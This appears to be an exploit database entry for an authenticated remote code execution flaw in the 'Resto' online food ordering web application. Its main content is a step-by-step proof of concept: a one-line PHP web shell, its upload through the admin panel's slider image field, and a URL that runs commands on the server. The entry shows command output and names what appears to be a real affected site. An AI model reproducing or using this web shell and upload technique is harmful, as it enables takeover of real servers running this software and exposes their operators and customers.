## https://sploitus.com/exploit?id=PACKETSTORM:189546
Title: Resto - Single Vendor Online Food Ordering - Authenticated RCE
Description: Resto Single Vendor Online
Source URL: https://res.newmedilife.in/admin
Source Name/Email: Mehmet Can Kadıoğlu a.k.a mao7un
CVEs: N/A
Software URL: https://www.codester.com/items/53350/resto-single-vendor-online-food-ordering-website
PoC:
1. Log in to the admin panel using the credentials.
2. Navigate to the "Sliders" tab on the victim's website (/admin/slider/).
3. Add a new slider.
4. Create a web shell on the attacker's machine by executing the following
command:
echo "<?php system($_GET['cmd']);?>" > cmd.php
5. Upload the web shell through the "Image" input field.
6. Copy the image path and execute a command using the following URL:
https://[target]/storage/app/public/admin-assets/images/slider/slider-67c459d300218.php?cmd=id
uid=4204(newmedil) gid=4206(newmedil) groups=4206(newmedil)